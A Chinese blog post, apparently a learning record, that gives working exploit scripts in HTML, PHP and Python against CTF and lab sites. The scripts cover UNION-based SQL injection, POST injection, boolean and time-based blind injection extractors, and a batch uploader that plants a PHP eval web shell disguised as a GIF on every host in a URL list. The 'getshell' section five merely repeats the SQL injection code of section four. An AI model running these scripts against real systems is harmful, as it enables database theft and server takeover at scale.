【EXP编写】注入EXP的简单编写

前言

制作简单exp的学习记录

一、简单的HTML编写注入EXP

1
2
3
4
5
6
7
8
9
10
11
12
13
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>简单的HTML EXP编写</title>
</head>
<body>
<form method="GET" action="http://ebc14e18-2cda-4cd7-b884-c4261c48768f.challenge.ctf.show:8080/">
<input type="hidden" name="id" value="1.1' union select 1,2,(select group_concat(table_name) from information_schema.tables where table_schema=database())#"/>
<input type="submit" value="利用" />
</form>
</body>
</html>

多增加一点,通过输入url来进行注入

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
<!DOCTYPE html>
<html>
<head>
<script>
function exploit() {
var x = document.getElementById("url").value
var c = document.getElementById("myform").action=x
if(x){
document.getElementById('myform').submit()
}else{
alert("请填写网址!")
}
}
</script>
<meta charset="utf-8">
<title>简单的HTML EXP编写</title>
</head>
<body>
<form id="myform">
<input type="text" id="url" size="50px">
<input type="hidden" name="id" value="1.1' union select 1,2,(select group_concat(table_name) from information_schema.tables where table_schema=database())#"/>
<input type="button" value="exploit" onclick="exploit()"/>
</form>
</body>
</html>

二、简单的PHP编写注入EXP

fsockopen()将返回一个文件句柄,之后可以被其他文件类函数调用(例如:fgets()fgetss()fwrite()fclose()还有feof())。如果调用失败,将返回FALSE

fsockopen是用来模拟发包的

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
<?php
$site="ebc14e18-2cda-4cd7-b884-c4261c48768f.challenge.ctf.show";
$payload="?id=1.1%27%20union%20select%201,2,(select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=database())%23";

$fp = fsockopen($site, 8080, $errno, $errstr, 30);
if(!$fp){
echo "$errstr ($errno)<br />\n";
} else{
$out = "GET /{$payload} HTTP/1.1\r\n";
$out .= "Host: {$site}:8080\r\n";
$out .= "Connection: keep-alive\r\n\r\n";
fwrite($fp, $out);
while (!feof($fp)){
echo fgets($fp, 128);
}
fclose($fp);
}

?>

匹配你想要的结果

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
<?php
$n=0;
$site="ebc14e18-2cda-4cd7-b884-c4261c48768f.challenge.ctf.show";
$payload="?id=1.1%27%20union%20select%201,2,(select%20group_concat(%27~%27,table_name,%27~%27)%20from%20information_schema.tables%20where%20table_schema=database())%23";

$fp = fsockopen($site, 8080, $errno, $errstr, 30);
if(!$fp){
echo "$errstr ($errno)<br />\n";
} else{
$out = "GET /{$payload} HTTP/1.1\r\n";
$out .= "Host: {$site}:8080\r\n";
$out .= "Connection: keep-alive\r\n\r\n";
fwrite($fp, $out);
while (!feof($fp)){
$n += 1;
$html = fgets($fp, 128);
preg_match_all("/~(.*?)~/", $html, $hash);
if($n==27){
print_r($hash);
}
}

}
fclose($fp);

?>

三、简单的python编写注入EXP

利用正则

1
2
3
4
5
6
7
8
9
10
11
12
import requests
import re

#获取payload源码

url = "http://81426808-4f66-48bf-84f4-327b8ba4b8c2.challenge.ctf.show:8080/"
def get_result(url):
payload = "id=1.1%27%20union%20select%201,2,(select%20group_concat(%27~%27,table_name,%27~%27)%20from%20information_schema.tables%20where%20table_schema=database())%23"
res = requests.get(url,payload)
result = re.findall('~(.*?)~',res.text)
return result
print('.'.join(get_result(url)))

四、POST的exp编写

python写法

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
# -- coding:UTF-8 --
# Author:孤桜懶契
# Date:2021/8/27
# blog: gylq.gitee.io

import requests
import re

#获取payload源码
url = "http://inject2.lab.aqlab.cn:81/Pass-05/index.php"
payload = "' union select 1,(select group_concat(schema_name) from information_schema.schemata),3 #"

def get_result(url):
data = {
'username' : payload,
'password' : '1'
}
res = requests.post(url,data)
result = re.findall('Your Login(.*?)<br>Your Password',res.text)
return result
print('.'.join(get_result(url)))

PHP写法

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
<?php
/**
* 模拟post进行url请求
* @param string $url
* @param array $post_data
*/
$url='http://inject2.lab.aqlab.cn:81/Pass-05/index.php';
function request_post($url = '', $post_data = array()) {
if (empty($url) || empty($post_data)){
return false;
}
$o = "";
foreach ($post_data as $k => $v ) {
$o .= "$k=".urlencode($v)."&";
}
$post_data =substr($o,0,-1);
$postUrl = $url;
$curlPost = $post_data;
$ch = curl_init(); //初始化curl
curl_setopt($ch, CURLOPT_URL, $postUrl); // 抓取指定网页
curl_setopt($ch, CURLOPT_HEADER, 0); // 设置header
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); // 要求结果为字符串并且输出到屏幕上
curl_setopt($ch, CURLOPT_POST, 1); //post提交方式
curl_setopt($ch, CURLOPT_POSTFIELDS, $curlPost);
$data = curl_exec($ch); //运行curl
curl_close($ch);

return $data;
}
$post_data = array("username"=>"' union select 1,(select group_concat(schema_name) from information_schema.schemata),3 #","password"=>"1","submit"=>"%E7%99%BB%E5%BD%95");
$html=request_post($url,$post_data);
preg_match('/Your Login(.*?)Yo/',$html, $match);
echo join($match);

?>

五、文件上传getshell,php写法

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
<?php
/**
* 模拟post进行url请求
* @param string $url
* @param array $post_data
*/
$url='http://inject2.lab.aqlab.cn:81/Pass-05/index.php';
function request_post($url = '', $post_data = array()) {
if (empty($url) || empty($post_data)){
return false;
}
$o = "";
foreach ($post_data as $k => $v ) {
$o .= "$k=".urlencode($v)."&";
}
$post_data =substr($o,0,-1);
$postUrl = $url;
$curlPost = $post_data;
$ch = curl_init(); //初始化curl
curl_setopt($ch, CURLOPT_URL, $postUrl); // 抓取指定网页
curl_setopt($ch, CURLOPT_HEADER, 0); // 设置header
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); // 要求结果为字符串并且输出到屏幕上
curl_setopt($ch, CURLOPT_POST, 1); //post提交方式
curl_setopt($ch, CURLOPT_POSTFIELDS, $curlPost);
$data = curl_exec($ch); //运行curl
curl_close($ch);

return $data;
}
$post_data = array("username"=>"' union select 1,(select group_concat(schema_name) from information_schema.schemata),3 #","password"=>"1","submit"=>"%E7%99%BB%E5%BD%95");
$html=request_post($url,$post_data);
preg_match('/Your Login(.*?)Yo/',$html, $match);
echo join($match);

?>

六、文件上传批量getshell,php写法

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
<?php


# 命令行参数>3
if(count($argv)<3){
print "\r\n\tUse Examply: ".$argv[0]." url.txt save.txt\r\n";
exit;
}


# 发包返回html页面
function http_send($host, $packet){

#echo "\n\r\nRequest:\n".$packet;
$sock = fsockopen($host, 8080);

if(!$sock){
print "\n[-] No response from {$host}:8080 Trying again...";
$sock = fsockopen($host, 8080);
}
fwrite($sock, $packet);
while (!feof($sock)) {

$resp=fread($sock,1024);
}
fclose($sock);
return $resp;


}

# burp抓的包进行写入
function data($host,$filename){

$payload .= "------WebKitFormBoundaryF1mJrJElc0yUu1HA\r\n";
$payload .= "Content-Disposition: form-data; name=\"file\"; filename=\"{$filename}\"\r\n";
$payload .= "Content-Type: image/png\r\n\r\n";
$payload .= 'GIF89a'."\r\n".'<?php eval($_REQUEST[shell])?>'."\r\n\r\n";
$payload .= "------WebKitFormBoundaryF1mJrJElc0yUu1HA--\r\n";
$packet = "POST /upload.php HTTP/1.1\r\n";
$packet .= "Host: {$host}:8080\r\n";
$packet .= "Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryF1mJrJElc0yUu1HA\r\n";
$packet .= "Content-Length: ".strlen($payload)."\r\n";
$packet .= "Connection: close\r\n\r\n";
$packet .= $payload;

return $packet;
}

# 调用发包
function exploit($host){
$filename = "b.php";
$hosts = "{$host}";
$packet=data($hosts,$filename);
$html=http_send($hosts,$packet);
preg_match_all('/msg\":\"(.*?)\"/',$html,$match);
return $match[0];
}

# 将结果输入到文件中
function w($fileName,$data){
fwrite(fopen($fileName,"a+"),$data."\r\n");
}

$url_txt = $argv[1];

$myurl = file($url_txt);

$save_file = $argv[2];

# 将数组遍历出来
foreach ($myurl as $value) {
#echo "Testing {$value}\r\n";
$v=substr($value,strpos($value,"//")+2);
$v=trim(str_replace("/", "", $v));
$html=exploit($v);
$result = "http://{$v}:8080/".trim(str_replace("\"","",substr($html[0],strpos($html[0],":")+2)));
echo "\r\n".$result;
w($save_file,$result);
sleep(1);
}

print "\r\n\r\n[+]-----------------------------WIN--------------------\r\n\r\n";
print "Save complete in {$save_file}\r\n\r\n";

// print "\n\r\n\nResponse:\n".$html."\r\n";
// print "\r\n\r\n[+]----------------------------Result-------------------------------\r\n";
// preg_match_all('/msg\":\"(.*?)\"/',$html,$match);
// echo "\r\n\r\n".join($match[0])."\r\n";
// if ($match[0]){
// print "\r\n\r\n[+]-----------------------------WIN---------------------------------\r\n";
// }else{
// print "\r\n\r\n[+]----------------------------FAILED-------------------------------\r\n";
// }
?>

七、布尔盲注python写法

python写法

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
# -- coding:UTF-8 --
# Author:孤桜懶契
# Date:2021/8/10
# blog: gylq.gitee.io

import requests
import time
url = "http://www.moonteamweb.com/mysqlinj.php?id="
flag = ""
#*************************************************************************************************************************************************************
#--------查库名
sql="select group_concat(schema_name) from information_schema.schemata"
#--------查表
#sql= "select group_concat(table_name) from information_schema.tables where table_schema='ctfshow'"
#--------查字段
#sql= "select group_concat(column_name) from information_schema.columns where table_schema='ctfshow' and table_name='flagbab'"
#--------查flag
#sql= "select flag4sa from ctfshow.flagbab"
#*************************************************************************************************************************************************************
payload = "1 and if(ascii(substr(({}),{},1))>'{}',1,0)"
i = 0

for i in range(1,100):
head = 32
tail = 127

while head < tail:
mid = (head + tail) >> 1
params=payload.format(sql,i,mid)
res = requests.get(url+params)
if "所谓SQL注入" in res.text:
head = mid + 1
else:
tail = mid
if head != 32:
print('[*] 开始盲注第{}位'.format(i))
flag += chr(tail)
print(flag)
else:
print('[*] Complete! Result Is >>> {}'.format(flag))
break

八、时间盲注python写法

python写法

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
# -- coding:UTF-8 --
# Author:孤桜懶契
# Date:2021/8/10
# blog: gylq.gitee.io

import requests
import time
url = "http://www.web15.com/mysqlinj.php?id="
flag = ""
#*************************************************************************************************************************************************************
#--------查库名
sql="select group_concat(schema_name) from information_schema.schemata"
#--------查表
#sql= "select group_concat(table_name) from information_schema.tables where table_schema='ctfshow'"
#--------查字段
#sql= "select group_concat(column_name) from information_schema.columns where table_schema='ctfshow' and table_name='flagbab'"
#--------查flag
#sql= "select flag4sa from ctfshow.flagbab"
#*************************************************************************************************************************************************************
payload = '1 or if(ascii(substr(({}),{},1))>"{}",sleep(1.5),1) '
i = 0

for i in range(1,100):
head = 32
tail = 127

while head < tail:
mid = (head + tail) >> 1
params=payload.format(sql,i,mid)
start = time.time()
res = requests.get(url+params)
end = time.time()
print(end -start)
if end-start > 1.4:
head = mid + 1
else:
tail = mid
if head != 32:
print('[*] 开始盲注第{}位'.format(i))
flag += chr(tail)
print(flag)
else:
print('[*] Complete! Result Is >>> {}'.format(flag))
break

我的个人博客

孤桜懶契:http://gylq.gitee.io

本文标题:【EXP编写】注入EXP的简单编写

文章作者:孤桜懶契

发布时间:2021年08月27日 - 12:55:02

最后更新:2021年10月20日 - 13:29:32

原始链接:https://gylq.gitee.io/posts/115.html

许可协议: 署名-非商业性使用-禁止演绎 4.0 国际 转载请保留原文链接及作者。

-------------------本文结束 感谢您的阅读-------------------